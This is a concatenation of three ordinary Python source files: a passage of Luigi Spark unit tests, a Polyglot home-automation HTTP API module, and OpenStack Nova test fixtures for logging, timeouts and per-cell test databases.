            self.fail("Should have thrown SparkJobError")
    @patch('luigi.contrib.spark.subprocess.Popen')
    def test_app_must_be_set(self, proc):
        # Running the base task without an `app` should be rejected.
        with self.assertRaises(NotImplementedError):
            job = SparkSubmitTask()
            job.run()
    @patch('luigi.contrib.spark.subprocess.Popen')
    def test_app_interruption(self, proc):
        # Ctrl-C while waiting should kill the spawned spark-submit process.
        def interrupt():
            raise KeyboardInterrupt()
        proc.return_value.wait = interrupt
        try:
            job = TestSparkSubmitTask()
            job.run()
        except KeyboardInterrupt:
            pass
        proc.return_value.kill.assert_called()
class PySparkTaskTest(unittest.TestCase):
    """Tests for PySparkTask: submit-command shape and in-process runner behavior."""
    ss = 'ss-stub'
    @with_config({'spark': {'spark-submit': ss, 'master': "spark://host:7077"}})
    @patch('luigi.contrib.spark.subprocess.Popen')
    def test_run(self, proc):
        setup_run_process(proc)
        job = TestPySparkTask()
        job.run()
        proc_arg_list = proc.call_args[0][0]
        self.assertEqual(proc_arg_list[0:7], ['ss-stub', '--master', 'spark://host:7077', '--deploy-mode', 'client', '--name', 'TestPySparkTask'])
        # The runner script must exist and the pickled task is passed to it.
        self.assertTrue(os.path.exists(proc_arg_list[7]))
        self.assertTrue(proc_arg_list[8].endswith('TestPySparkTask.pickle'))
    @with_config({'spark': {'py-packages': 'dummy_test_module'}})
    @patch.dict('sys.modules', {'pyspark': MagicMock()})
    @patch('pyspark.SparkContext')
    def test_pyspark_runner(self, spark_context):
        sc = spark_context.return_value.__enter__.return_value
        def mock_spark_submit(task):
            from luigi.contrib.pyspark_runner import PySparkRunner
            PySparkRunner(*task.app_command()[1:]).run()
            # Check py-package exists
            self.assertTrue(os.path.exists(sc.addPyFile.call_args[0][0]))
        with patch.object(SparkSubmitTask, 'run', mock_spark_submit):
            job = TestPySparkTask()
            job.run()
        # The unpickled task's main() should have driven the mocked SparkContext.
        sc.textFile.assert_called_with('input')
        sc.textFile.return_value.saveAsTextFile.assert_called_with('output')
class SparkJobTest(unittest.TestCase):
    """Tests for the legacy YARN SparkJob command construction and failures."""
    hcd = 'hcd-stub'
    ycd = 'ycd-stub'
    sj = 'sj-stub'
    sc = 'sc-sub'
    @with_config({'spark': {'hadoop-conf-dir': hcd, 'yarn-conf-dir': ycd, 'spark-jar': sj, 'spark-class': sc}})
    @patch('luigi.contrib.spark.subprocess.Popen')
    @patch('luigi.contrib.hdfs.HdfsTarget')
    def test_run(self, target, proc):
        setup_run_process(proc)
        job = TestSparkJob()
        job.run()
        self.assertEqual(proc.call_args[0][0], [self.sc, 'org.apache.spark.deploy.yarn.Client', '--jar', job.jar(), '--class', job.job_class(),
                                                '--num-workers', '2', '--master-memory', '1g', '--worker-memory', '1g'])
    @with_config({'spark': {'hadoop-conf-dir': hcd, 'yarn-conf-dir': ycd, 'spark-jar': sj, 'spark-class': sc}})
    @patch('luigi.contrib.spark.tempfile.TemporaryFile')
    @patch('luigi.contrib.spark.subprocess.Popen')
    def test_handle_failed_job(self, proc, file):
        # A non-zero return code should raise SparkJobError carrying stderr.
        proc.return_value.returncode = 1
        file.return_value = BytesIO(b'stderr')
        try:
            job = TestSparkJob()
            job.run()
        except SparkJobError as e:
            self.assertEqual(e.err, 'stderr')
            self.assertTrue('STDERR: stderr' in six.text_type(e))
        else:
            self.fail("Should have thrown SparkJobError")
class Spark1xTest(unittest.TestCase):
    """Tests for the Spark 1.x JVM job wrapper."""
    ss = 'ss-stub'
    @with_config({'spark': {'spark-submit': ss}})
    @patch('luigi.contrib.spark.subprocess.Popen')
    def test_run(self, proc):
        setup_run_process(proc)
        job = TestSpark1xJob()
        job.run()
        self.assertEqual(proc.call_args[0][0], [self.ss, '--master', 'yarn-client', '--class', job.job_class(), job.jar()])
    @with_config({'spark': {'spark-submit': ss}})
    @patch('luigi.contrib.spark.tempfile.TemporaryFile')
    @patch('luigi.contrib.spark.subprocess.Popen')
    def test_handle_failed_job(self, proc, file):
        # A non-zero return code should raise SparkJobError carrying stderr.
        proc.return_value.returncode = 1
        file.return_value = BytesIO(b'stderr')
        try:
            job = TestSpark1xJob()
            job.run()
        except SparkJobError as e:
            self.assertEqual(e.err, 'stderr')
            self.assertTrue('STDERR: stderr' in six.text_type(e))
        else:
            self.fail("Should have thrown SparkJobError")
class PySpark1xTest(unittest.TestCase):
    """Tests for the Spark 1.x Python job wrapper."""
    ss = 'ss-stub'
    @with_config({'spark': {'spark-submit': ss}})
    @patch('luigi.contrib.spark.subprocess.Popen')
    def test_run(self, proc):
        setup_run_process(proc)
        job = TestPySpark1xJob()
        job.run()
        self.assertEqual(proc.call_args[0][0], [self.ss, '--master', 'yarn-client', job.program()])
    @with_config({'spark': {'spark-submit': ss}})
    @patch('luigi.contrib.spark.tempfile.TemporaryFile')
    @patch('luigi.contrib.spark.subprocess.Popen')
    def test_handle_failed_job(self, proc, file):
        # A non-zero return code should raise SparkJobError carrying stderr.
        proc.return_value.returncode = 1
        file.return_value = BytesIO(b'stderr')
        try:
            job = TestPySpark1xJob()
            job.run()
        except SparkJobError as e:
            self.assertEqual(e.err, 'stderr')
            self.assertTrue('STDERR: stderr' in six.text_type(e))
        else:
            self.fail("Should have thrown SparkJobError")
| |
''' Polyglot API definition '''
# pylint: disable=no-name-in-module, import-error
import json
import logging
# from polyglot.element_manager import http
import http
import polyglot.nodeserver_helpers as nshelpers
_LOGGER = logging.getLogger(__name__)
# Element configuration; this element currently keeps no state of its own.
CONFIG = {}
# Reference to the Polyglot application; set in load().
PGLOT = None
def load(pglot, user_config):
    ''' Set up the API handlers and register them with the HTTP server. '''
    # pylint: disable=global-statement, unused-argument
    global PGLOT
    # register addresses with server
    http.register(HANDLERS, parent_dir='api')
    # Register Polyglot application
    PGLOT = pglot
    _LOGGER.info('Loaded API element')
def unload():
    ''' Unloads the API element. No teardown is required; this only logs. '''
    _LOGGER.info('Unloaded API element')
def get_config():
    """ Returns the element's configuration (always empty for this element). """
    return dict()
def set_config(config):
    """ Updates the current configuration (a no-op for this element). """
    # pylint: disable=unused-argument
    return None
class GenericAPIHandler(http.AbstractHandler):
    """ Generic Handler that verifies Node Server. """
    # Maps HTTP status codes to the reason phrases used in responses.
    STATUS = {200: 'HTTP_OK', 400: 'BAD_REQUEST', 404: 'HTTP_NOT_FOUND'}
    def __init__(self, *args, **kwargs):
        super(GenericAPIHandler, self).__init__(*args, **kwargs)
        # Per-request context; populated by subclasses as needed.
        self.node_server = None
        self.store = None
        self.request_id = None
    def send_not_found(self):
        ''' sends a not found response back to the client. '''
        self.send_json({}, 404)
    def send_json(self, data=None, status=200, message=None):
        '''
        sends json payload as a response.
        :param data: Payload to send to client
        :param status: Status code to send to client
        :param message: Optional human-readable message added to the payload
        '''
        if not data:
            data = {}
        self.set_status(status, self.STATUS[status])
        # "success" mirrors the HTTP status: anything below 300 counts as success.
        output = ({'success': status < 300, 'payload': data})
        if message:
            output['message'] = str(message)
        self.write(json.dumps(output))
        self.finish()
    def send_zip(self, fname, data):
        ''' Sends zip data to client. '''
        self.set_status(200, 'HTTP_OK')
        self.set_header('Content-Type', 'application/zip')
        self.set_header(
            'Content-Disposition', 'attachment; filename={}'.format(fname))
        self.write(data)
        self.finish()
    def send_txt(self, data):
        ''' Sends plain text data to client. '''
        self.set_status(200, 'HTTP_OK')
        self.set_header('Content-Type', 'text/plain')
        self.write(data)
        self.finish()
class ConfigHandler(GenericAPIHandler):
    ''' /config '''
    def get(self):
        ''' Respond with the global configuration plus the Polyglot version. '''
        config = PGLOT.elements.config
        config['pgver'] = PGLOT.version
        self.send_json(config)
class ConfigSetHTTPHandler(GenericAPIHandler):
    ''' /config/set/http '''
    def get(self):
        ''' Update the HTTP server configuration from query arguments. '''
        config = {'username': self.get_argument('username'),
                  'password': self.get_argument('password'),
                  'port': int(self.get_argument('port'))}
        # Refuse privileged (<=1024) ports.
        if config['port'] <= 1024:
            self.send_json(message='Port must be greater than 1024',
                           status=400)
            return
        PGLOT.elements.set_config({'http': config})
        self.send_json()
class ConfigSetISYHandler(GenericAPIHandler):
    ''' /config/set/isy '''
    def get(self):
        ''' Update the ISY connection configuration from query arguments. '''
        config = {'username': self.get_argument('username'),
                  'password': self.get_argument('password'),
                  'address': self.get_argument('address'),
                  'port': int(self.get_argument('port')),
                  'https': self.get_argument('https', 'off') == 'on'}
        PGLOT.elements.set_config({'isy': config})
        self.send_json()
class ServersAvailableHandler(GenericAPIHandler):
    ''' /servers/available '''
    def get(self):
        ''' Respond with the list of installed node server types. '''
        payload = []
        for platform, info in nshelpers.available_servers().items():
            payload.append({'platform': platform, 'name': info['name']})
        self.send_json(payload)
class ServersAddHandler(GenericAPIHandler):
    ''' /servers/add '''
    def get(self):
        ''' Start a new node server described by the query arguments. '''
        nsdata = {'nsname': self.get_argument('name'),
                  'profile_number': int(self.get_argument('nsid')),
                  'ns_platform': self.get_argument('type')}
        try:
            PGLOT.nodeservers.start_server(**nsdata)
            self.send_json()
        except ValueError as err:
            # start_server rejects bad input with ValueError; surface it as a 400.
            self.send_json(message=err.args[0], status=400)
class ServersActiveHandler(GenericAPIHandler):
    ''' /servers/active '''
    def get(self):
        ''' Respond with all managed node servers and their running state. '''
        servers = [{'id': key, 'name': val.name,
                    'running': val.alive and val.responding}
                   for key, val in PGLOT.nodeservers.servers.items()]
        self.send_json(servers)
class ServerHandler(GenericAPIHandler):
    ''' /server/([A-Za-z0-9]+) '''
    def get(self, base_url):
        ''' Respond with the definition of a single node server, or 404. '''
        servers = PGLOT.nodeservers.servers
        if base_url not in servers:
            self.send_not_found()
            return
        self.send_json(servers[base_url].definition)
class ServerProfileHandler(GenericAPIHandler):
    ''' /server/([A-Za-z0-9]+)/profile '''
    def get(self, base_url):
        ''' Respond with the node server's profile as a zip download, or 404. '''
        if base_url in PGLOT.nodeservers.servers:
            profile = PGLOT.nodeservers.servers[base_url].profile
            name = PGLOT.nodeservers.servers[base_url].name
            self.send_zip('{}_profile.zip'.format(name), profile)
        else:
            self.send_not_found()
class ServerRestartHandler(GenericAPIHandler):
    ''' /server/([A-Za-z0-9]+)/restart '''
    def get(self, base_url):
        ''' Restart the named node server, or 404 if unknown. '''
        if base_url not in PGLOT.nodeservers.servers:
            self.send_not_found()
            return
        PGLOT.nodeservers.servers[base_url].restart()
        self.send_json()
class ServerDeleteHandler(GenericAPIHandler):
    ''' /server/([A-Za-z0-9]+)/delete '''
    def get(self, base_url):
        ''' Remove the named node server, or 404 if unknown. '''
        if base_url not in PGLOT.nodeservers.servers:
            self.send_not_found()
            return
        PGLOT.nodeservers.delete(base_url)
        self.send_json()
class LogHandler(GenericAPIHandler):
    ''' /log.txt '''
    def get(self):
        ''' Send the Polyglot log as plain text. '''
        self.send_txt(PGLOT.get_log())
# All request handler classes exported to the web server, in routing
# order. ConfigHandler is defined earlier in this module.
HANDLERS = [ConfigHandler, ConfigSetHTTPHandler, ConfigSetISYHandler,
            ServersAvailableHandler, ServersAddHandler, ServersActiveHandler,
            ServerHandler, ServerProfileHandler, ServerRestartHandler,
            ServerDeleteHandler, LogHandler]
| |
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Fixtures for Nova tests."""
from __future__ import absolute_import
import collections
from contextlib import contextmanager
import logging as std_logging
import os
import warnings
import fixtures
from keystoneauth1 import session as ks
import mock
from oslo_concurrency import lockutils
from oslo_config import cfg
import oslo_messaging as messaging
from oslo_messaging import conffixture as messaging_conffixture
from requests import adapters
from wsgi_intercept import interceptor
from nova.api.openstack.compute import tenant_networks
from nova.api.openstack.placement import deploy as placement_deploy
from nova.compute import rpcapi as compute_rpcapi
from nova import context
from nova.db import migration
from nova.db.sqlalchemy import api as session
from nova import exception
from nova.network import model as network_model
from nova import objects
from nova.objects import base as obj_base
from nova.objects import service as service_obj
from nova import quota as nova_quota
from nova import rpc
from nova import service
from nova.tests.functional.api import client
from nova.tests import uuidsentinel
# Environment-variable values (OS_DEBUG, OS_STDOUT_CAPTURE, ...) that are
# treated as "enabled" by the fixtures below.
_TRUE_VALUES = ('True', 'true', '1', 'yes')
CONF = cfg.CONF
# Cached SQL schema dumps keyed by database type; populated lazily by the
# Database/CellDatabases fixtures so migrations only run once per test run.
DB_SCHEMA = {'main': "", 'api': ""}
# Module-level guard so oslo.db's enginefacade is configured only once.
SESSION_CONFIGURED = False
class ServiceFixture(fixtures.Fixture):
    """Run a service as a test fixture."""

    def __init__(self, name, host=None, **kwargs):
        """Record the kwargs used to create the service in setUp.

        :param name: service name (e.g. 'compute'); also used to build
            the default binary name 'nova-<name>'.
        :param host: hostname for the service; defaults to ``name``.
        """
        # Removed a dead no-op statement (`name = name`) from the
        # original.
        # If not otherwise specified, the host will default to the
        # name of the service. Some things like aggregates care that
        # this is stable.
        host = host or name
        kwargs.setdefault('host', host)
        kwargs.setdefault('binary', 'nova-%s' % name)
        self.kwargs = kwargs

    def setUp(self):
        super(ServiceFixture, self).setUp()
        self.service = service.Service.create(**self.kwargs)
        self.service.start()
        # Make sure the service is stopped when the test finishes.
        self.addCleanup(self.service.kill)
class NullHandler(std_logging.Handler):
    """Custom default NullHandler that still formats each record.

    Used in conjunction with
    log_fixture.get_logging_handle_error_fixture to detect formatting
    errors in debug level logs without saving the logs.
    """

    def handle(self, record):
        # Formatting is the whole point: a bad format string or wrong
        # arguments blow up here even though nothing is emitted.
        self.format(record)

    def emit(self, record):
        # Discard the record entirely.
        pass

    def createLock(self):
        # No output means no shared state, so no lock is required.
        self.lock = None
class StandardLogging(fixtures.Fixture):
    """Setup Logging redirection for tests.

    There are a number of things we want to handle with logging in tests:

    * Redirect the logging to somewhere that we can test or dump it later.
    * Ensure that as many DEBUG messages as possible are actually
      executed, to ensure they are actually syntactically valid (they
      often have not been).
    * Ensure that we create useful output for tests that doesn't
      overwhelm the testing system (which means we can't capture the
      100 MB of debug logging on every run).

    To do this we create a logger fixture at the root level, which
    defaults to INFO and create a Null Logger at DEBUG which lets
    us execute log messages at DEBUG but not keep the output.

    To support local debugging OS_DEBUG=True can be set in the
    environment, which will print out the full debug logging.

    There are also a set of overrides for particularly verbose
    modules to be even less than INFO.
    """
    def setUp(self):
        super(StandardLogging, self).setUp()
        # set root logger to debug
        root = std_logging.getLogger()
        root.setLevel(std_logging.DEBUG)
        # supports collecting debug level for local runs
        if os.environ.get('OS_DEBUG') in _TRUE_VALUES:
            level = std_logging.DEBUG
        else:
            level = std_logging.INFO
        # Collect logs
        fs = '%(asctime)s %(levelname)s [%(name)s] %(message)s'
        self.logger = self.useFixture(
            fixtures.FakeLogger(format=fs, level=None))
        # TODO(sdague): why can't we send level through the fake
        # logger? Tests prove that it breaks, but it's worth getting
        # to the bottom of.
        root.handlers[0].setLevel(level)
        if level > std_logging.DEBUG:
            # Just attempt to format debug level logs, but don't save them
            handler = NullHandler()
            self.useFixture(fixtures.LogHandler(handler, nuke_handlers=False))
            handler.setLevel(std_logging.DEBUG)
        # Don't log every single DB migration step
        std_logging.getLogger(
            'migrate.versioning.api').setLevel(std_logging.WARNING)
        # At times we end up calling back into main() functions in
        # testing. This has the possibility of calling logging.setup
        # again, which completely unwinds the logging capture we've
        # created here. Once we've setup the logging the way we want,
        # disable the ability for the test to change this.
        def fake_logging_setup(*args):
            pass
        self.useFixture(
            fixtures.MonkeyPatch('oslo_log.log.setup', fake_logging_setup))
class OutputStreamCapture(fixtures.Fixture):
    """Capture output streams during tests.

    Errant printing to stderr/stdout is collected so it can be
    inspected after the run instead of interleaving with test output.
    Capture is opt-in per stream via the OS_STDOUT_CAPTURE and
    OS_STDERR_CAPTURE environment variables.
    """
    def setUp(self):
        super(OutputStreamCapture, self).setUp()
        capture_out = os.environ.get('OS_STDOUT_CAPTURE') in _TRUE_VALUES
        capture_err = os.environ.get('OS_STDERR_CAPTURE') in _TRUE_VALUES
        if capture_out:
            self.out = self.useFixture(fixtures.StringStream('stdout'))
            self.useFixture(
                fixtures.MonkeyPatch('sys.stdout', self.out.stream))
        if capture_err:
            self.err = self.useFixture(fixtures.StringStream('stderr'))
            self.useFixture(
                fixtures.MonkeyPatch('sys.stderr', self.err.stream))

    @property
    def stderr(self):
        # StringStream stores the captured text in its detail object.
        return self.err._details["stderr"].as_text()

    @property
    def stdout(self):
        return self.out._details["stdout"].as_text()
class Timeout(fixtures.Fixture):
    """Setup per test timeouts.

    In order to avoid test deadlocks we support setting up a test
    timeout parameter read from the environment. In almost all cases
    where the timeout is reached this means a deadlock.

    A class level TIMEOUT_SCALING_FACTOR also exists, which allows
    extremely long tests to specify they need more time.
    """
    def __init__(self, timeout, scaling=1):
        super(Timeout, self).__init__()
        try:
            seconds = int(timeout)
        except ValueError:
            # An unparsable timeout value disables the timeout entirely.
            seconds = 0
        if scaling < 1:
            raise ValueError('scaling value must be >= 1')
        self.test_timeout = seconds * scaling

    def setUp(self):
        super(Timeout, self).setUp()
        if self.test_timeout > 0:
            self.useFixture(fixtures.Timeout(self.test_timeout, gentle=True))
class DatabasePoisonFixture(fixtures.Fixture):
    """Explode if a test configures a DB session it did not declare.

    Patches enginefacade's session creation so a test that touches
    global oslo_db state without claiming database usage fails with an
    explanatory error instead of silently corrupting later DB-using
    tests.
    """
    def setUp(self):
        super(DatabasePoisonFixture, self).setUp()
        self.useFixture(fixtures.MonkeyPatch(
            'oslo_db.sqlalchemy.enginefacade._TransactionFactory.'
            '_create_session',
            self._poison_configure))
    def _poison_configure(self, *a, **k):
        # If you encounter this error, you might be tempted to just not
        # inherit from NoDBTestCase. Bug #1568414 fixed a few hundred of these
        # errors, and not once was that the correct solution. Instead,
        # consider some of the following tips (when applicable):
        #
        # - mock at the object layer rather than the db layer, for example:
        #      nova.objects.instance.Instance.get
        #            vs.
        #      nova.db.instance_get
        #
        # - mock at the api layer rather than the object layer, for example:
        #      nova.api.openstack.common.get_instance
        #            vs.
        #      nova.objects.instance.Instance.get
        #
        # - mock code that requires the database but is otherwise tangential
        #   to the code you're testing (for example: EventReporterStub)
        #
        # - peruse some of the other database poison warning fixes here:
        #   https://review.openstack.org/#/q/topic:bug/1568414
        raise Exception('This test uses methods that set internal oslo_db '
                        'state, but it does not claim to use the database. '
                        'This will conflict with the setup of tests that '
                        'do use the database and cause failures later.')
class SingleCellSimple(fixtures.Fixture):
    """Setup the simplest cells environment possible.

    This should be used when you do not care about multiple cells,
    or having a "real" environment for tests that should not care.
    This will give you a single cell, and map any and all accesses
    to that cell (even things that would go to cell0).

    If you need to distinguish between cell0 and cellN, then you
    should use the CellDatabases fixture.

    If instances should appear to still be in scheduling state, pass
    instances_created=False to init.
    """
    def __init__(self, instances_created=True):
        # When False, instance mappings report no cell assignment, which
        # makes instances look like they are still being scheduled.
        self.instances_created = instances_created
    def setUp(self):
        super(SingleCellSimple, self).setUp()
        # Every DB-facing mapping lookup is redirected to a canned
        # single-cell answer; cell targeting becomes a pass-through.
        self.useFixture(fixtures.MonkeyPatch(
            'nova.objects.CellMappingList._get_all_from_db',
            self._fake_cell_list))
        self.useFixture(fixtures.MonkeyPatch(
            'nova.objects.CellMapping._get_by_uuid_from_db',
            self._fake_cell_get))
        self.useFixture(fixtures.MonkeyPatch(
            'nova.objects.HostMapping._get_by_host_from_db',
            self._fake_hostmapping_get))
        self.useFixture(fixtures.MonkeyPatch(
            'nova.objects.InstanceMapping._get_by_instance_uuid_from_db',
            self._fake_instancemapping_get))
        self.useFixture(fixtures.MonkeyPatch(
            'nova.objects.InstanceMappingList._get_by_instance_uuids_from_db',
            self._fake_instancemapping_get_uuids))
        self.useFixture(fixtures.MonkeyPatch(
            'nova.objects.InstanceMapping._save_in_db',
            self._fake_instancemapping_get))
        self.useFixture(fixtures.MonkeyPatch(
            'nova.context.target_cell',
            self._fake_target_cell))
        self.useFixture(fixtures.MonkeyPatch(
            'nova.context.set_target_cell',
            lambda c, m: None))
    def _fake_hostmapping_get(self, *args):
        # Canned host mapping pointing at the single cell.
        return {'id': 1,
                'updated_at': None,
                'created_at': None,
                'host': 'host1',
                'cell_mapping': self._fake_cell_list()[0]}
    def _fake_instancemapping_get(self, *args):
        # Canned instance mapping; cell assignment depends on whether
        # instances are considered created yet.
        return {
            'id': 1,
            'updated_at': None,
            'created_at': None,
            'instance_uuid': args[-1],
            'cell_id': (self.instances_created and 1 or None),
            'project_id': 'project',
            'cell_mapping': (
                self.instances_created and self._fake_cell_get() or None),
        }
    def _fake_instancemapping_get_uuids(self, *args):
        # One mapping per requested uuid (uuids are the last argument).
        return [self._fake_instancemapping_get(uuid)
                for uuid in args[-1]]
    def _fake_cell_get(self, *args):
        return self._fake_cell_list()[0]
    def _fake_cell_list(self, *args):
        # The one and only cell in this environment.
        return [{'id': 1,
                 'updated_at': None,
                 'created_at': None,
                 'uuid': uuidsentinel.cell1,
                 'name': 'onlycell',
                 'transport_url': 'fake://nowhere/',
                 'database_connection': 'sqlite:///'}]
    @contextmanager
    def _fake_target_cell(self, context, target_cell):
        # NOTE(danms): Just pass through the context without actually
        # targeting anything.
        yield context
class CheatingSerializer(rpc.RequestContextSerializer):
    """A messaging.RequestContextSerializer that helps with cells.

    The normal serializer deliberately does not pass db_connection and
    mq_connection along — a remote RPC server should not use our values
    for those. In unit and functional tests everything runs in one
    process, though, so cell-targeted RPC calls should preserve them.
    Short of per-service config and database-layer state for the fake
    services we start, this is a reasonable cheat.
    """
    def serialize_context(self, context):
        """Serialize context with the db_connection inside."""
        serialized = super(CheatingSerializer, self).serialize_context(context)
        serialized['db_connection'] = context.db_connection
        serialized['mq_connection'] = context.mq_connection
        return serialized

    def deserialize_context(self, values):
        """Deserialize context and honor db_connection if present."""
        ctxt = super(CheatingSerializer, self).deserialize_context(values)
        ctxt.db_connection = values.pop('db_connection', None)
        ctxt.mq_connection = values.pop('mq_connection', None)
        return ctxt
class CellDatabases(fixtures.Fixture):
    """Create per-cell databases for testing.

    How to use::

      fix = CellDatabases()
      fix.add_cell_database('connection1')
      fix.add_cell_database('connection2', default=True)
      self.useFixture(fix)

    Passing default=True tells the fixture which database should
    be given to code that doesn't target a specific cell.
    """
    def __init__(self):
        # Map of connection string -> enginefacade context manager.
        self._ctxt_mgrs = {}
        # Context manager handed out for untargeted ("local") DB access.
        self._last_ctxt_mgr = None
        # The manager restored after leaving a target-cell context.
        self._default_ctxt_mgr = None
        # NOTE(danms): Use a ReaderWriterLock to synchronize our
        # global database muckery here. If we change global db state
        # to point to a cell, we need to take an exclusive lock to
        # prevent any other calls to get_context_manager() until we
        # reset to the default.
        self._cell_lock = lockutils.ReaderWriterLock()
    def _cache_schema(self, connection_str):
        # NOTE(melwitt): See the regular Database fixture for why
        # we do this.
        global DB_SCHEMA
        if not DB_SCHEMA['main']:
            ctxt_mgr = self._ctxt_mgrs[connection_str]
            engine = ctxt_mgr.get_legacy_facade().get_engine()
            conn = engine.connect()
            migration.db_sync(database='main')
            DB_SCHEMA['main'] = "".join(line for line
                                        in conn.connection.iterdump())
            engine.dispose()
    @contextmanager
    def _wrap_target_cell(self, context, cell_mapping):
        """Replacement for nova.context.target_cell.

        Takes the write lock, switches the "last used" context manager
        to the targeted cell for the duration of the block, and restores
        the default on exit.
        """
        with self._cell_lock.write_lock():
            if cell_mapping is None:
                # NOTE(danms): The real target_cell untargets with a
                # cell_mapping of None. Since we're controlling our
                # own targeting in this fixture, we need to call this out
                # specifically and avoid switching global database state
                try:
                    with self._real_target_cell(context, cell_mapping) as c:
                        yield c
                finally:
                    return
            ctxt_mgr = self._ctxt_mgrs[cell_mapping.database_connection]
            # This assumes the next local DB access is the same cell that
            # was targeted last time.
            self._last_ctxt_mgr = ctxt_mgr
            try:
                with self._real_target_cell(context, cell_mapping) as ccontext:
                    yield ccontext
            finally:
                # Once we have returned from the context, we need
                # to restore the default context manager for any
                # subsequent calls
                self._last_ctxt_mgr = self._default_ctxt_mgr
    def _wrap_create_context_manager(self, connection=None):
        # Replacement for nova.db.sqlalchemy.api.create_context_manager:
        # hand back the pre-built per-cell manager.
        ctxt_mgr = self._ctxt_mgrs[connection]
        return ctxt_mgr
    def _wrap_get_context_manager(self, context):
        # Replacement for nova.db.sqlalchemy.api.get_context_manager.
        try:
            # If already targeted, we can proceed without a lock
            if context.db_connection:
                return context.db_connection
        except AttributeError:
            # Unit tests with None, FakeContext, etc
            pass
        # NOTE(melwitt): This is a hack to try to deal with
        # local accesses i.e. non target_cell accesses.
        with self._cell_lock.read_lock():
            return self._last_ctxt_mgr
    def _wrap_get_server(self, target, endpoints, serializer=None):
        """Mirror rpc.get_server() but with our special sauce."""
        serializer = CheatingSerializer(serializer)
        return messaging.get_rpc_server(rpc.TRANSPORT,
                                        target,
                                        endpoints,
                                        executor='eventlet',
                                        serializer=serializer)
    def _wrap_get_client(self, target, version_cap=None, serializer=None):
        """Mirror rpc.get_client() but with our special sauce."""
        serializer = CheatingSerializer(serializer)
        return messaging.RPCClient(rpc.TRANSPORT,
                                   target,
                                   version_cap=version_cap,
                                   serializer=serializer)
    def add_cell_database(self, connection_str, default=False):
        """Add a cell database to the fixture.

        :param connection_str: An identifier used to represent the connection
            string for this database. It should match the
            database_connection field in the corresponding CellMapping.
        :param default: when True, this database is used for untargeted
            access.
        """
        # NOTE(danms): Create a new context manager for the cell, which
        # will house the sqlite:// connection for this cell's in-memory
        # database. Store/index it by the connection string, which is
        # how we identify cells in CellMapping.
        ctxt_mgr = session.create_context_manager()
        self._ctxt_mgrs[connection_str] = ctxt_mgr
        # NOTE(melwitt): The first DB access through service start is
        # local so this initializes _last_ctxt_mgr for that and needs
        # to be a compute cell.
        self._last_ctxt_mgr = ctxt_mgr
        # NOTE(danms): Record which context manager should be the default
        # so we can restore it when we return from target-cell contexts.
        # If none has been provided yet, store the current one in case
        # no default is ever specified.
        if self._default_ctxt_mgr is None or default:
            self._default_ctxt_mgr = ctxt_mgr
        def get_context_manager(context):
            return ctxt_mgr
        # NOTE(danms): This is a temporary MonkeyPatch just to get
        # a new database created with the schema we need and the
        # context manager for it stashed.
        with fixtures.MonkeyPatch(
                'nova.db.sqlalchemy.api.get_context_manager',
                get_context_manager):
            self._cache_schema(connection_str)
            engine = ctxt_mgr.get_legacy_facade().get_engine()
            engine.dispose()
            conn = engine.connect()
            conn.connection.executescript(DB_SCHEMA['main'])
    def setUp(self):
        super(CellDatabases, self).setUp()
        self.addCleanup(self.cleanup)
        self._real_target_cell = context.target_cell
        # NOTE(danms): These context managers are in place for the
        # duration of the test (unlike the temporary ones above) and
        # provide the actual "runtime" switching of connections for us.
        self.useFixture(fixtures.MonkeyPatch(
            'nova.db.sqlalchemy.api.create_context_manager',
            self._wrap_create_context_manager))
        self.useFixture(fixtures.MonkeyPatch(
            'nova.db.sqlalchemy.api.get_context_manager',
            self._wrap_get_context_manager))
        self.useFixture(fixtures.MonkeyPatch(
            'nova.context.target_cell',
            self._wrap_target_cell))
        self.useFixture(fixtures.MonkeyPatch(
            'nova.rpc.get_server',
            self._wrap_get_server))
        self.useFixture(fixtures.MonkeyPatch(
            'nova.rpc.get_client',
            self._wrap_get_client))
    def cleanup(self):
        # Dispose all pooled connections so the in-memory cell databases
        # are released.
        for ctxt_mgr in self._ctxt_mgrs.values():
            engine = ctxt_mgr.get_legacy_facade().get_engine()
            engine.dispose()
class Database(fixtures.Fixture):
    """Provide a fresh, migrated database for a test."""
    def __init__(self, database='main', connection=None):
        """Create a database fixture.

        :param database: The type of database, 'main' or 'api'
        :param connection: The connection string to use
        """
        super(Database, self).__init__()
        # NOTE(pkholkin): oslo_db.enginefacade is configured in tests the same
        # way as it is done for any other service that uses db
        global SESSION_CONFIGURED
        if not SESSION_CONFIGURED:
            session.configure(CONF)
            SESSION_CONFIGURED = True
        self.database = database
        if database == 'main':
            if connection is not None:
                ctxt_mgr = session.create_context_manager(
                    connection=connection)
                facade = ctxt_mgr.get_legacy_facade()
                self.get_engine = facade.get_engine
            else:
                self.get_engine = session.get_engine
        elif database == 'api':
            self.get_engine = session.get_api_engine
    def _cache_schema(self):
        # Run the migrations once per test run and cache the resulting
        # schema as a SQL script so later resets can executescript() it
        # instead of re-running migrations.
        global DB_SCHEMA
        if not DB_SCHEMA[self.database]:
            engine = self.get_engine()
            conn = engine.connect()
            migration.db_sync(database=self.database)
            DB_SCHEMA[self.database] = "".join(line for line
                                               in conn.connection.iterdump())
            engine.dispose()
    def cleanup(self):
        engine = self.get_engine()
        engine.dispose()
    def reset(self):
        # Rebuild a pristine database from the cached schema dump.
        self._cache_schema()
        engine = self.get_engine()
        engine.dispose()
        conn = engine.connect()
        conn.connection.executescript(DB_SCHEMA[self.database])
    def setUp(self):
        super(Database, self).setUp()
        self.reset()
        self.addCleanup(self.cleanup)
class DatabaseAtVersion(fixtures.Fixture):
    """Provide a database synced only up to a given migration version."""
    def __init__(self, version, database='main'):
        """Create a database fixture.

        :param version: Max version to sync to (or None for current)
        :param database: The type of database, 'main' or 'api'
        """
        super(DatabaseAtVersion, self).__init__()
        self.version = version
        self.database = database
        engines = {'main': session.get_engine,
                   'api': session.get_api_engine}
        if database in engines:
            self.get_engine = engines[database]

    def cleanup(self):
        # Drop pooled connections so the in-memory database goes away.
        self.get_engine().dispose()

    def reset(self):
        engine = self.get_engine()
        engine.dispose()
        engine.connect()
        migration.db_sync(version=self.version, database=self.database)

    def setUp(self):
        super(DatabaseAtVersion, self).setUp()
        self.reset()
